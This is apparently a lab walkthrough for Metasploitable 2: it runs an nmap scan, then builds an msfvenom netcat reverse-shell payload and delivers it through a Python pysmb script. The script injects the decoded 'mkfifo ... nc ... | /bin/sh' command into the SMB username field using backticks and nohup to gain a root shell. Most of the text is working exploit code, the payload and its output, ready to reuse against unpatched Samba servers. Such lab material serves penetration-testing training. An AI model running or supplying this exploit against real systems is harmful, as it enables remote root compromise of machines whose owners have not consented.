No Hang Up + Command Injection on Mestasploitable 2

![_aa2a1bf9-fdc5-4b30-9e07-d1c1b6b388de](https://hackmd.io/_uploads/BJhBIubN6.jpg =600x600) # No Hang Up + Command Injection on Mestasploitable 2 # Recon Nmap Scan ```bash= nmap -sV -oA output -v 192.168.136.132 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login OpenBSD or Solaris rlogind 514/tcp open tcpwrapped 1099/tcp open java-rmi GNU Classpath grmiregistry 1524/tcp open bindshell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11 (access denied) 6667/tcp open irc UnrealIRCd 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 ``` We will try the SMB protocol. Tools needed for this task **MsfVenom** **Python** This is going to be a simple netcat reverse shell. ## Developing the payload The payload will be the command that will connect to our machine Therefore we will need our machine ip + port. This payload will be for unix **msfVenom command** ```bash= msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.136.129 LPORT=777 -f python* [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload [-] No arch selected, selecting arch: cmd from the payload No encoder specified, outputting raw payload Payload size: 104 bytes Final size of python file: 526 bytes buf = b"" buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f" buf += b"\x75\x76\x6c\x63\x72\x6d\x68\x3b\x20\x6e\x63\x20" buf += b"\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x36\x2e" buf += b"\x31\x32\x39\x20\x37\x37\x37\x20\x30\x3c\x2f\x74" buf += b"\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68\x20\x7c" buf += b"\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74" buf += b"\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68\x20\x32" buf += b"\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70" buf += b"\x2f\x75\x76\x6c\x63\x72\x6d\x68" root@kali:~/Documents/CTF/Msf# ``` This is just a raw hex output. If i decode this with a hex decoder we will get the netcat command. ```bash= root@kali:~/Documents/CTF/Msf# printf '\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70 \x2f\x75\x76\x6c\x63\x72\x6d\x68 \x3b\x20\x6e\x63\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x36\x2e\x31\x32\ x39\x20\x37\x37\x37\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x 68\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70\x2f\x75\x7 6\x6c\x63\x72\x6d\x68\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70 \x2f\x75\x76\x6c\x63\x72\x6d\x68' mkfifo /tmp/uvlcrmh; nc 192.168.136.129 777 0</tmp/uvlcrmh | /bin/sh >/tmp/uvlcrmh 2>&1; ``` ## Making the Python script Install the smb module ```shell= pip install pysmb ``` ```python= #!/usr/bin/env python from smb.SMBConnection import SMBConnection def get_command_buffer(): # Add the payload here strCommandBuffer = b"" strCommandBuffer += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x75\x76\x6c \x63\x72\x6d\x68\x3b\x20\x6e\x63\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x36 \x2e\x31\x32\x39\x20\x37\x37\x37\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x75\x76\x6c\x63\x72\x 6d\x68\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70\x2f\x 75\x76\x6c\x63\x72\x6d\x68\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x 6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68" return strCommandBuffer def run_exploit(): strCommandBuffer = get_command_buffer() strEncodedUserId = f"/=`nohup {strCommandBuffer.decode()}`" strServerIp = "192.168.136.132" # <- Add IP of the server try: conn = SMBConnection(strEncodedUserId, "", "HELLO", "TEST", use_ntlm_v2=False) conn.connect(strServerIp, 445) except Exception as e: print(f"An error occurred: {e}") if __name__ == "__main__": run_exploit() ``` SMB and Command Execution Vulnerabilities: The Server Message Block (SMB) protocol is used for file sharing, printer sharing, and access to remote services on a network. In some older or unpatched systems (like those simulated in Metasploitable), SMB may be vulnerable to remote command execution. This means an attacker could potentially execute arbitrary commands on the server through the SMB protocol. Exploiting nohup in the Context: The nohup command is designed to run processes in the background, ensuring that they don't terminate when the controlling terminal is closed. In an exploit scenario, if an attacker can execute commands via SMB, they might use nohup to ensure that their malicious processes (like a reverse shell) continue running even if the initial connection is disrupted. This creates a form of persistence for the attacker. In the script will inject a netcat connection to a listeting server. ## Make the listener The listener will be the same port that is in the payload ```shell= nc -lvnp 777 listening on [any] 777 ... ``` ## Run the script ```shell= python exploit.py ``` ## Result ![Skjermbilde 2023-11-15 090954](https://hackmd.io/_uploads/Hk8xpgzE6.png) Now your are root The script will time out but you will stil be inside the system. We can incoporate a while loop to the script to prevent time out. ---